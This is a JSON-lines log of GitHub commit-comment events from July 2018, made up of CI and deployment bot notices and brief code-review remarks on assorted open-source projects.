{"id":"7958782370","type":"CommitCommentEvent","actor":{"login":"NEDCampDev"},"repo":{"name":"NEDCamp/nedcamp"},"payload":{"comment":{"id":29691393,"position":null,"line":null,"path":null,"commit_id":"0cdd0ac579c16fcb10c9a18e721075b851e262bd","created_at":"2018-07-12T21:22:17Z","updated_at":"2018-07-12T21:22:17Z","author_association":"COLLABORATOR","body":"Created multidev environment [nedcamp#ci-125](https://dashboard.pantheon.io/sites/1e9ab33c-01d3-42bd-bb42-5008333172a3#ci-125).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-125-nedcamp.pantheonsite.io/)"}},"created_at":"2018-07-12T21:22:17Z"}
{"id":"7958786834","type":"CommitCommentEvent","actor":{"login":"dborstelmann"},"repo":{"name":"SlalomSTLHealthcare/healthcare-web"},"payload":{"comment":{"id":29691401,"position":null,"line":null,"path":null,"commit_id":"622773772e8f331ea130e82ccec7807c160ae9bf","created_at":"2018-07-12T21:23:19Z","updated_at":"2018-07-12T21:23:19Z","author_association":"CONTRIBUTOR","body":"👍"}},"created_at":"2018-07-12T21:23:19Z"}
{"id":"7958811046","type":"CommitCommentEvent","actor":{"login":"americkson"},"repo":{"name":"RAIL-UGA/rail-uga-stellar"},"payload":{"comment":{"id":29691472,"position":null,"line":null,"path":null,"commit_id":"601027e43bc98d6b42a01fd542fd336b3e83df25","created_at":"2018-07-12T21:28:51Z","updated_at":"2018-07-12T21:28:51Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [rail-uga-stellar#pr-41](https://dashboard.pantheon.io/sites/05f5afa3-c1ec-448f-915a-9234103f2409#pr-41).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-41-rail-uga-stellar.pantheonsite.io/)"}},"created_at":"2018-07-12T21:28:51Z"}
{"id":"7958824799","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29691517,"position":null,"line":null,"path":null,"commit_id":"1a0d274927c2bb06b414438f8ab1a48ac8dbe4bd","created_at":"2018-07-12T21:31:57Z","updated_at":"2018-07-12T21:31:57Z","author_association":"NONE","body":"issue_6736 (mbadams5) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: OK (2313 of 2313 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-1a0d274927c2bb06b414438f8ab1a48ac8dbe4bd-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-1a0d274927c2bb06b414438f8ab1a48ac8dbe4bd-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-1a0d274927c2bb06b414438f8ab1a48ac8dbe4bd-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-71.2%25-green.png)</a>\n"}},"created_at":"2018-07-12T21:31:57Z"}
{"id":"7958829525","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"Djuliuss/Remittance"},"payload":{"comment":{"id":29691536,"position":36,"line":42,"path":"contracts/Remittance.sol","commit_id":"0d6c0cff0432c8ae16e0c571fc6790616457e5d4","created_at":"2018-07-12T21:33:04Z","updated_at":"2018-07-12T21:33:04Z","author_association":"NONE","body":"You need to make sure there is a challenge.\r\nHashing off-chain is indeed on the right track."}},"created_at":"2018-07-12T21:33:04Z"}
{"id":"7958830349","type":"CommitCommentEvent","actor":{"login":"hiwayshoes"},"repo":{"name":"hiwayshoes/projectHGCE"},"payload":{"comment":{"id":29691538,"position":2,"line":2,"path":"README.md","commit_id":"51e5656a3a36fb50ef7b17f71f75213f56ee4d5c","created_at":"2018-07-12T21:33:15Z","updated_at":"2018-07-12T21:33:15Z","author_association":"OWNER","body":"update README.md file"}},"created_at":"2018-07-12T21:33:15Z"}
{"id":"7958830389","type":"CommitCommentEvent","actor":{"login":"gavin-schaeferle"},"repo":{"name":"gavin-schaeferle/python_flask_ibm"},"payload":{"comment":{"id":29691540,"position":null,"line":null,"path":null,"commit_id":"65dc97d73200552998c5d071b536537ae721fe4a","created_at":"2018-07-12T21:33:16Z","updated_at":"2018-07-12T21:33:16Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.ng.bluemix.net/devops/toolchains/77bcaea4-21aa-4d04-8c1b-d3f74100547e?env_id=ibm%3Ayp%3Aus-south \"myToolchain\"): [Delivery Pipeline](https://console.ng.bluemix.net/devops/pipelines/3a59dec4-b069-424f-af82-e120a52c23d8?env_id=ibm%3Ayp%3Aus-south \"myPipeline1\") deployed [python_flask_ibm](https://github.com/gavin-schaeferle/python_flask_ibm/releases/tag/deploy-ibm-yp-us-south-gavin.schaeferle-ibm.com-dev-20180712-213315 \"deploy-ibm-yp-us-south-gavin.schaeferle-ibm.com-dev-20180712-213315\") to [dev](https://console.bluemix.net/apps/07f4811d-6f2e-4402-bf81-7a955f6e2ab8?env_id=ibm:yp:us-south \"ibm:yp:us-south:gavin.schaeferle@ibm.com:dev\"), including this commit"}},"created_at":"2018-07-12T21:33:16Z"}
{"id":"7958833097","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29691550,"position":null,"line":null,"path":null,"commit_id":"1a0d274927c2bb06b414438f8ab1a48ac8dbe4bd","created_at":"2018-07-12T21:33:53Z","updated_at":"2018-07-12T21:33:53Z","author_association":"NONE","body":"issue_6736 (mbadams5) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-1a0d274927c2bb06b414438f8ab1a48ac8dbe4bd-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-12T21:33:53Z"}
{"id":"7958834981","type":"CommitCommentEvent","actor":{"login":"MilenaLavanchy"},"repo":{"name":"MilenaLavanchy/omnidial"},"payload":{"comment":{"id":29691555,"position":null,"line":null,"path":null,"commit_id":"ec300be4d457bc509823f5917ea234c019457807","created_at":"2018-07-12T21:34:20Z","updated_at":"2018-07-12T21:34:20Z","author_association":"OWNER","body":"Reverse the arguments of the assertEquals"}},"created_at":"2018-07-12T21:34:20Z"}
{"id":"7958838802","type":"CommitCommentEvent","actor":{"login":"LordLukin"},"repo":{"name":"Tomek52/StudentDatabase"},"payload":{"comment":{"id":29691576,"position":27,"line":27,"path":"dataBase.cpp","commit_id":"e5a412e8ed5c230911572f095247b08e92e65ca1","created_at":"2018-07-12T21:35:15Z","updated_at":"2018-07-12T21:35:15Z","author_association":"NONE","body":"ten kawałek ze sprawdzaniem indeksu nadaje się na oddzielną funkcję. Będzie czytelniej :)"}},"created_at":"2018-07-12T21:35:15Z"}
{"id":"7958839787","type":"CommitCommentEvent","actor":{"login":"Djuliuss"},"repo":{"name":"Djuliuss/Remittance"},"payload":{"comment":{"id":29691578,"position":70,"line":74,"path":"contracts/Remittance.sol","commit_id":"0d6c0cff0432c8ae16e0c571fc6790616457e5d4","created_at":"2018-07-12T21:35:29Z","updated_at":"2018-07-12T21:35:29Z","author_association":"OWNER","body":"> I see this restriction as artificial. You see, your intent is that, whether the payment was processed, or the payment was claimed back, the fee will anyway be paid. So why wait for something to happen before it can be claimed?\r\n\r\nBecause I am emptying the contract with `address(this).balance` I need to make sure that funds have been transferred. I thought I can't just do `owner.transfer(fee)` because at this stage the ether stored in the contract is lower than the initial `fee` as the contract has had to pay the gas of the transactions at this stage.  \r\nAs a consequence, I need to make sure that I only can claim the fees as an owner once I have transferred the funds to the exchange (or back to the payer)."}},"created_at":"2018-07-12T21:35:29Z"}
{"id":"7958840791","type":"CommitCommentEvent","actor":{"login":"hiwayshoes"},"repo":{"name":"hiwayshoes/projectHGCE"},"payload":{"comment":{"id":29691582,"position":null,"line":null,"path":null,"commit_id":"51e5656a3a36fb50ef7b17f71f75213f56ee4d5c","created_at":"2018-07-12T21:35:43Z","updated_at":"2018-07-12T21:35:43Z","author_association":"OWNER","body":"update README.md file to include 'themes'"}},"created_at":"2018-07-12T21:35:43Z"}
{"id":"7958842945","type":"CommitCommentEvent","actor":{"login":"broeker"},"repo":{"name":"electriccitizen/lawhelp"},"payload":{"comment":{"id":29691589,"position":null,"line":null,"path":null,"commit_id":"2862f91fd293fcc2b5eba0a71ea9b9838cdbae6c","created_at":"2018-07-12T21:36:15Z","updated_at":"2018-07-12T21:36:15Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [lawhelp#ci-475](https://dashboard.pantheon.io/sites/9ec12d94-c804-44b7-968e-166a0b49fdc0#ci-475).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-475-lawhelp.pantheonsite.io/)"}},"created_at":"2018-07-12T21:36:15Z"}
{"id":"7958843176","type":"CommitCommentEvent","actor":{"login":"LordLukin"},"repo":{"name":"Tomek52/StudentDatabase"},"payload":{"comment":{"id":29691592,"position":41,"line":41,"path":"dataBase.cpp","commit_id":"e5a412e8ed5c230911572f095247b08e92e65ca1","created_at":"2018-07-12T21:36:19Z","updated_at":"2018-07-12T21:36:19Z","author_association":"NONE","body":"Tu widzę duplikację funkcjonalności. Operator<< robi coś podobnego."}},"created_at":"2018-07-12T21:36:19Z"}
{"id":"7958848563","type":"CommitCommentEvent","actor":{"login":"JacquesCarette"},"repo":{"name":"JacquesCarette/Drasil"},"payload":{"comment":{"id":29691603,"position":15,"line":83,"path":"code/drasil-code/Language/Drasil/CodeSpec.hs","commit_id":"62c37254b4ee21059c51187460bbc0f6b83a455e","created_at":"2018-07-12T21:37:36Z","updated_at":"2018-07-12T21:37:36Z","author_association":"OWNER","body":"The code generator does need to extract the information it needs from somewhere. It is a bit wasteful to go via `QDefinition` (i.e. `qdFromDD`) rather than 'directly'.  Is there a reason `qtoc` can't do it on its own?  You'd have to map it onto each [as `defs'` and `ddefs` have different types]."}},"created_at":"2018-07-12T21:37:36Z"}
{"id":"7958850548","type":"CommitCommentEvent","actor":{"login":"bmat7717"},"repo":{"name":"bmat7717/sample-cloud-native-toolchain-tutorial-20180711164926396"},"payload":{"comment":{"id":29691612,"position":null,"line":null,"path":null,"commit_id":"7b8efe73cd8355584ca518d85478a0597919e52b","created_at":"2018-07-12T21:38:05Z","updated_at":"2018-07-12T21:38:05Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.ng.bluemix.net/devops/toolchains/e6dff075-9245-474a-ae5b-0a597014cb8f?env_id=ibm%3Ayp%3Aus-south \"cloud-native-toolchain-tutorial-20180711164926396\"): [Delivery Pipeline](https://console.ng.bluemix.net/devops/pipelines/58352fe8-148f-4101-9eda-8ef7aefd707f?env_id=ibm%3Ayp%3Aus-south \"sample-cloud-native-toolchain-tutorial-20180711164926396\") deployed [sample-cloud-native-toolchain-tutorial-20180711164926396](https://github.com/bmat7717/sample-cloud-native-toolchain-tutorial-20180711164926396/releases/tag/deploy-ibm-yp-us-south-junkmail4ever55-gmail.com-test-20180712-213804 \"deploy-ibm-yp-us-south-junkmail4ever55-gmail.com-test-20180712-213804\") to [test](https://console.bluemix.net/apps/ee726959-ca2e-4176-8032-61753438afc4?env_id=ibm:yp:us-south \"ibm:yp:us-south:junkmail4ever55@gmail.com:test\"), including this commit"}},"created_at":"2018-07-12T21:38:05Z"}
{"id":"7958851701","type":"CommitCommentEvent","actor":{"login":"cgcloud-jenkins"},"repo":{"name":"vgteam/vg"},"payload":{"comment":{"id":29691613,"position":null,"line":null,"path":null,"commit_id":"8845e8b3106d2f1239196f2052ff79396d622862","created_at":"2018-07-12T21:38:21Z","updated_at":"2018-07-12T21:38:21Z","author_association":"NONE","body":"[Jenkins vg tests](http://jenkins.cgcloud.info/job/vg/1995/) complete for merge to master.  View the [full report here](http://cgl-pipeline-inputs.s3.amazonaws.com/vg_cgl/vg_ci/jenkins_reports/branch/master/index.html).\n\n19 tests passed, 0 tests failed and 10 tests skipped in 21156 seconds\n\nTests produced 2926 warnings. 2926 were for lower-than-expected alignment scores\n\n"}},"created_at":"2018-07-12T21:38:21Z"}
{"id":"7958852414","type":"CommitCommentEvent","actor":{"login":"davimatfacil"},"repo":{"name":"davimatfacil/meurepo"},"payload":{"comment":{"id":29691615,"position":null,"line":null,"path":null,"commit_id":"30a399f10b8884739bf183c85444946c2856d261","created_at":"2018-07-12T21:38:31Z","updated_at":"2018-07-12T21:38:31Z","author_association":"OWNER","body":"primeiro backup"}},"created_at":"2018-07-12T21:38:31Z"}
{"id":"7958854116","type":"CommitCommentEvent","actor":{"login":"JacquesCarette"},"repo":{"name":"JacquesCarette/Drasil"},"payload":{"comment":{"id":29691619,"position":15,"line":83,"path":"code/drasil-code/Language/Drasil/CodeSpec.hs","commit_id":"62c37254b4ee21059c51187460bbc0f6b83a455e","created_at":"2018-07-12T21:38:55Z","updated_at":"2018-07-12T21:38:55Z","author_association":"OWNER","body":"So I would say that your fix is mostly correct, but a little sub-optimal. Not really a hack."}},"created_at":"2018-07-12T21:38:55Z"}
{"id":"7958857455","type":"CommitCommentEvent","actor":{"login":"JacquesCarette"},"repo":{"name":"JacquesCarette/Drasil"},"payload":{"comment":{"id":29691650,"position":null,"line":null,"path":null,"commit_id":"b2e0915f18d54bd981e5311e9d9671e6003b549e","created_at":"2018-07-12T21:39:41Z","updated_at":"2018-07-12T21:39:41Z","author_association":"OWNER","body":"This change is excellent!"}},"created_at":"2018-07-12T21:39:41Z"}
{"id":"7958857842","type":"CommitCommentEvent","actor":{"login":"APN-Pucky"},"repo":{"name":"APN-Pucky/tyrant_optimize"},"payload":{"comment":{"id":29691652,"position":null,"line":null,"path":null,"commit_id":"684553bc7a95506fcbb4ae8ee217fce8e0dbb1cc","created_at":"2018-07-12T21:39:46Z","updated_at":"2018-07-12T21:39:46Z","author_association":"OWNER","body":"Fixed with next commit. I copied it from a line chat without checking. thanks."}},"created_at":"2018-07-12T21:39:46Z"}
{"id":"7958858795","type":"CommitCommentEvent","actor":{"login":"remotezygote"},"repo":{"name":"sinonjs/lolex"},"payload":{"comment":{"id":29691655,"position":null,"line":null,"path":null,"commit_id":"79f9431a7278509ebffbe107484f521f76b3f665","created_at":"2018-07-12T21:39:59Z","updated_at":"2018-07-12T21:39:59Z","author_association":"NONE","body":"This needs to be reverted, as it does not work for redefining properties that are getters that have no setter."}},"created_at":"2018-07-12T21:39:59Z"}
{"id":"7958865561","type":"CommitCommentEvent","actor":{"login":"dopry"},"repo":{"name":"petermetz/cordova-plugin-ibeacon"},"payload":{"comment":{"id":29691668,"position":null,"line":null,"path":null,"commit_id":"9d0b818af1f661a5e0183d7b3c5845baf2b8f821","created_at":"2018-07-12T21:41:36Z","updated_at":"2018-07-12T21:41:36Z","author_association":"COLLABORATOR","body":"@p-sebastian, can you open an issue for this?  In my next update, I'm moving to load directly from package repos rather than keeping a local copy.  Would that resolve this? "}},"created_at":"2018-07-12T21:41:36Z"}
{"id":"7958866754","type":"CommitCommentEvent","actor":{"login":"charlesrp"},"repo":{"name":"spacetelescope/stisblazefix"},"payload":{"comment":{"id":29691674,"position":null,"line":null,"path":null,"commit_id":"71bbc47c9b55b775fe95411b651949834ed623a9","created_at":"2018-07-12T21:41:53Z","updated_at":"2018-07-12T21:41:53Z","author_association":"CONTRIBUTOR","body":"Hi Sean:\r\n\r\nThis looks like it should work.  Have you tested it to see how the plotting output handles the NaN you're now returning for the error in the parameters?\r\n\r\nOtherwise I'm fine with this change, although I haven't tried to run the modified code myself.\r\n\r\nCharles"}},"created_at":"2018-07-12T21:41:53Z"}
{"id":"7958866960","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"Djuliuss/Remittance"},"payload":{"comment":{"id":29691675,"position":70,"line":74,"path":"contracts/Remittance.sol","commit_id":"0d6c0cff0432c8ae16e0c571fc6790616457e5d4","created_at":"2018-07-12T21:41:56Z","updated_at":"2018-07-12T21:41:56Z","author_association":"NONE","body":"Ah no, the contract does not pay the transfer gas fees. It is the `tx.origin` that pays it, so yes, try it."}},"created_at":"2018-07-12T21:41:56Z"}
{"id":"7958867482","type":"CommitCommentEvent","actor":{"login":"bmat7717"},"repo":{"name":"bmat7717/sample-cloud-native-toolchain-tutorial-20180711164926396"},"payload":{"comment":{"id":29691676,"position":null,"line":null,"path":null,"commit_id":"7b8efe73cd8355584ca518d85478a0597919e52b","created_at":"2018-07-12T21:42:05Z","updated_at":"2018-07-12T21:42:05Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.ng.bluemix.net/devops/toolchains/e6dff075-9245-474a-ae5b-0a597014cb8f?env_id=ibm%3Ayp%3Aus-south \"cloud-native-toolchain-tutorial-20180711164926396\"): [Delivery Pipeline](https://console.ng.bluemix.net/devops/pipelines/58352fe8-148f-4101-9eda-8ef7aefd707f?env_id=ibm%3Ayp%3Aus-south \"sample-cloud-native-toolchain-tutorial-20180711164926396\") deployed [sample-cloud-native-toolchain-tutorial-20180711164926396](https://github.com/bmat7717/sample-cloud-native-toolchain-tutorial-20180711164926396/releases/tag/deploy-ibm-yp-us-south-junkmail4ever55-gmail.com-prod-20180712-214204 \"deploy-ibm-yp-us-south-junkmail4ever55-gmail.com-prod-20180712-214204\") to [prod](https://console.bluemix.net/apps/b14e19dc-e7b0-4b68-a112-423d9d5988c8?env_id=ibm:yp:us-south \"ibm:yp:us-south:junkmail4ever55@gmail.com:prod\"), including this commit"}},"created_at":"2018-07-12T21:42:05Z"}
{"id":"7958872838","type":"CommitCommentEvent","actor":{"login":"rjbain"},"repo":{"name":"rjbain/dgreat"},"payload":{"comment":{"id":29691685,"position":null,"line":null,"path":null,"commit_id":"f2a2cd3ee11e73a83049eb33e5295b2029afba29","created_at":"2018-07-12T21:43:23Z","updated_at":"2018-07-12T21:43:23Z","author_association":"OWNER","body":"Created multidev environment [dgreat#ci-704](https://dashboard.pantheon.io/sites/41cad7fe-472d-43a9-a470-d391b9622376#ci-704).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-704-dgreat.pantheonsite.io/)"}},"created_at":"2018-07-12T21:43:23Z"}
{"id":"7958886382","type":"CommitCommentEvent","actor":{"login":"Blueyescat"},"repo":{"name":"SkriptLang/Skript"},"payload":{"comment":{"id":29691708,"position":null,"line":null,"path":null,"commit_id":"cba65526a60debfd9ad1c1a34b55c022b6bca37a","created_at":"2018-07-12T21:46:36Z","updated_at":"2018-07-12T21:46:36Z","author_association":"CONTRIBUTOR","body":"I th'''\""}},"created_at":"2018-07-12T21:46:36Z"}
{"id":"7958887938","type":"CommitCommentEvent","actor":{"login":"Blueyescat"},"repo":{"name":"SkriptLang/Skript"},"payload":{"comment":{"id":29691716,"position":null,"line":null,"path":null,"commit_id":"cba65526a60debfd9ad1c1a34b55c022b6bca37a","created_at":"2018-07-12T21:47:00Z","updated_at":"2018-07-12T21:47:00Z","author_association":"CONTRIBUTOR","body":"I think\r\n> disallow it after setting fly\r\nis a good idea of it doesn't have a problem 🤔 "}},"created_at":"2018-07-12T21:47:00Z"}
{"id":"7958894644","type":"CommitCommentEvent","actor":{"login":"sarahg"},"repo":{"name":"sarahg/borked"},"payload":{"comment":{"id":29691730,"position":null,"line":null,"path":null,"commit_id":"22fdce94998607ee269490ddb1581f77e0881885","created_at":"2018-07-12T21:48:37Z","updated_at":"2018-07-12T21:48:37Z","author_association":"OWNER","body":"Created multidev environment [borked#pr-4](https://dashboard.pantheon.io/sites/8f2545fd-8ec0-4689-8fab-e0e8bb485e35#pr-4).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-4-borked.pantheonsite.io/)"}},"created_at":"2018-07-12T21:48:37Z"}
{"id":"7958894895","type":"CommitCommentEvent","actor":{"login":"aidanjohnson"},"repo":{"name":"aidanjohnson/dt7816"},"payload":{"comment":{"id":29691731,"position":null,"line":null,"path":null,"commit_id":"0d321f7f379d32efde19b77b8f5e0b2056843dd9","created_at":"2018-07-12T21:48:40Z","updated_at":"2018-07-12T21:48:40Z","author_association":"OWNER","body":"https://brendancleary.com/2013/03/08/including-a-github-wiki-in-a-repository-as-a-submodule/"}},"created_at":"2018-07-12T21:48:40Z"}
{"id":"7958895060","type":"CommitCommentEvent","actor":{"login":"broeker"},"repo":{"name":"electriccitizen/lawhelp"},"payload":{"comment":{"id":29691734,"position":null,"line":null,"path":null,"commit_id":"a1c7712d751a8b11f05e8178cd419c1315153b51","created_at":"2018-07-12T21:48:43Z","updated_at":"2018-07-12T21:48:43Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [lawhelp#pr-af-react](https://dashboard.pantheon.io/sites/9ec12d94-c804-44b7-968e-166a0b49fdc0#pr-af-react).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-af-react-lawhelp.pantheonsite.io/)"}},"created_at":"2018-07-12T21:48:43Z"}
{"id":"7958901851","type":"CommitCommentEvent","actor":{"login":"vak2ve"},"repo":{"name":"HistoryAtState/frus"},"payload":{"comment":{"id":29691754,"position":null,"line":null,"path":null,"commit_id":"d49ecd2a4b0f05cf7d9e0238bfcfd858c3cf75bd","created_at":"2018-07-12T21:50:20Z","updated_at":"2018-07-12T21:50:20Z","author_association":"CONTRIBUTOR","body":"@WaxCylinderRevival I'd really appreciate any input on the //note/note problem in comp4--I introduced that error while rearranging those documents, as the original encoding didn't distinguish between the English and French sections at all (so it would be page break, x paragraphs of English, x paragraphs of French, page break). The page images seem to treat the French translation as a note without a pointer, typographically speaking, so that's how I restructured it, but could it also be interpreted as a frus:attachment? That would simplify the document and get rid of the problem of notes within notes."}},"created_at":"2018-07-12T21:50:20Z"}
{"id":"7958904120","type":"CommitCommentEvent","actor":{"login":"origindesign"},"repo":{"name":"origindesign/skitaos"},"payload":{"comment":{"id":29691761,"position":null,"line":null,"path":null,"commit_id":"fd69c73ef140f9431edd853c2b6c9a68cd502d63","created_at":"2018-07-12T21:50:54Z","updated_at":"2018-07-12T21:50:54Z","author_association":"OWNER","body":"Created multidev environment [ski-taos#ci-30](https://dashboard.pantheon.io/sites/22e63f3f-bdff-4894-a158-a29f219020d1#ci-30).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-30-ski-taos.pantheonsite.io/)"}},"created_at":"2018-07-12T21:50:54Z"}
{"id":"7958908214","type":"CommitCommentEvent","actor":{"login":"pantheondocs"},"repo":{"name":"pantheon-systems/documentation"},"payload":{"comment":{"id":29691764,"position":null,"line":null,"path":null,"commit_id":"7b6568a21b4416b18236794c7d329f8d37fe0bf7","created_at":"2018-07-12T21:51:55Z","updated_at":"2018-07-12T21:51:55Z","author_association":"NONE","body":"The following doc(s) have been deployed to the [updatersyn](https://updatersyn-static-docs.pantheonsite.io/docs) Multidev environment:\n- [scripts/deploy-multidev.sh](https://github.com/pantheon-systems/documentation/commit/817e8082cc375aebde4b4103792ee529818c6a56/scripts/deploy-multidev.sh)\n- [/docs/shibboleth-sso](https://updatersyn-static-docs.pantheonsite.io/docs/shibboleth-sso)\n"}},"created_at":"2018-07-12T21:51:55Z"}
{"id":"7958914972","type":"CommitCommentEvent","actor":{"login":"rjbain"},"repo":{"name":"rjbain/dgreat"},"payload":{"comment":{"id":29691784,"position":null,"line":null,"path":null,"commit_id":"82c4cabc0c4b07986b9c6f30298999b9bc1fc298","created_at":"2018-07-12T21:53:32Z","updated_at":"2018-07-12T21:53:32Z","author_association":"OWNER","body":"Created multidev environment [dgreat#ci-707](https://dashboard.pantheon.io/sites/41cad7fe-472d-43a9-a470-d391b9622376#ci-707).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-707-dgreat.pantheonsite.io/)"}},"created_at":"2018-07-12T21:53:32Z"}
{"id":"7958915948","type":"CommitCommentEvent","actor":{"login":"eskatos"},"repo":{"name":"gradle/kotlin-dsl"},"payload":{"comment":{"id":29691787,"position":null,"line":null,"path":null,"commit_id":"1a0ba816fc59eaa15a8fe59f0caaf022f29db838","created_at":"2018-07-12T21:53:46Z","updated_at":"2018-07-12T21:53:46Z","author_association":"MEMBER","body":"Nice move!"}},"created_at":"2018-07-12T21:53:46Z"}
{"id":"7958921517","type":"CommitCommentEvent","actor":{"login":"vito"},"repo":{"name":"concourse/pipelines"},"payload":{"comment":{"id":29691797,"position":null,"line":null,"path":null,"commit_id":"9c857bcf4ccdc8177876bcd08252c4a1ea061551","created_at":"2018-07-12T21:55:01Z","updated_at":"2018-07-12T21:55:01Z","author_association":"MEMBER","body":"woops."}},"created_at":"2018-07-12T21:55:01Z"}
{"id":"7958928294","type":"CommitCommentEvent","actor":{"login":"rjbain"},"repo":{"name":"rjbain/dgreat"},"payload":{"comment":{"id":29691812,"position":null,"line":null,"path":null,"commit_id":"82c4cabc0c4b07986b9c6f30298999b9bc1fc298","created_at":"2018-07-12T21:56:40Z","updated_at":"2018-07-12T21:56:40Z","author_association":"OWNER","body":"Created multidev environment [dgreat#ci-710](https://dashboard.pantheon.io/sites/41cad7fe-472d-43a9-a470-d391b9622376#ci-710).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-710-dgreat.pantheonsite.io/)"}},"created_at":"2018-07-12T21:56:40Z"}
{"id":"7958931243","type":"CommitCommentEvent","actor":{"login":"esqui2002"},"repo":{"name":"esqui2002/coinchange"},"payload":{"comment":{"id":29691819,"position":4,"line":412,"path":"src/p2p/net_node.inl","commit_id":"8ef5360554c64f7af48ca5c417549573e2db363a","created_at":"2018-07-12T21:57:22Z","updated_at":"2018-07-12T21:57:22Z","author_association":"OWNER","body":"Remove testnet nodes\r\n"}},"created_at":"2018-07-12T21:57:22Z"}
{"id":"7958931561","type":"CommitCommentEvent","actor":{"login":"chaddw"},"repo":{"name":"Harrisondscott/Classifier"},"payload":{"comment":{"id":29691820,"position":null,"line":null,"path":null,"commit_id":"b149a3a959e3415df8d6294964fa4b1d32694320","created_at":"2018-07-12T21:57:27Z","updated_at":"2018-07-12T21:57:27Z","author_association":"COLLABORATOR","body":"rudimentary window"}},"created_at":"2018-07-12T21:57:27Z"}
{"id":"7958937264","type":"CommitCommentEvent","actor":{"login":"Shroompow"},"repo":{"name":"Shroompow/DedShroom"},"payload":{"comment":{"id":29691833,"position":null,"line":null,"path":null,"commit_id":"9ebac1a17c40f1874bcbf2ef149b1c4bf4825167","created_at":"2018-07-12T21:58:49Z","updated_at":"2018-07-12T21:58:49Z","author_association":"OWNER","body":"ooohh noooo"}},"created_at":"2018-07-12T21:58:49Z"}
{"id":"7958938016","type":"CommitCommentEvent","actor":{"login":"chaddw"},"repo":{"name":"Harrisondscott/Classifier"},"payload":{"comment":{"id":29691837,"position":null,"line":null,"path":null,"commit_id":"b149a3a959e3415df8d6294964fa4b1d32694320","created_at":"2018-07-12T21:59:01Z","updated_at":"2018-07-12T21:59:01Z","author_association":"COLLABORATOR","body":"![bird](https://user-images.githubusercontent.com/39812402/42661793-3fead2fe-85fd-11e8-8253-e66391fc6364.jpg)\r\n"}},"created_at":"2018-07-12T21:59:01Z"}
{"id":"7958943133","type":"CommitCommentEvent","actor":{"login":"steadicat"},"repo":{"name":"streamich/nano-css"},"payload":{"comment":{"id":29691850,"position":null,"line":null,"path":null,"commit_id":"d6f0ad58d2bf5e0204e482abe4b9b16ca7d0bc49","created_at":"2018-07-12T22:00:15Z","updated_at":"2018-07-12T22:00:15Z","author_association":"NONE","body":"Is there a way to disable those warnings? They’re very loud in development:\r\n\r\n<img width=\"549\" alt=\"image\" src=\"https://user-images.githubusercontent.com/6031/42661830-3f9543ca-85e4-11e8-95cb-454b3bc284ab.png\">\r\n"}},"created_at":"2018-07-12T22:00:15Z"}
{"id":"7958943179","type":"CommitCommentEvent","actor":{"login":"hissingshark"},"repo":{"name":"hrydgard/ppsspp"},"payload":{"comment":{"id":29691851,"position":21,"line":79,"path":"Core/MIPS/MIPSAsm.cpp","commit_id":"8ae157e27fdf30165f657db238a89d08363305bc","created_at":"2018-07-12T22:00:15Z","updated_at":"2018-07-12T22:00:15Z","author_association":"CONTRIBUTOR","body":"Sorry.  I rebased my fork against upstream/master before starting some work, but forgot about the submodules.  Many thanks.  Every day's a school day."}},"created_at":"2018-07-12T22:00:15Z"}
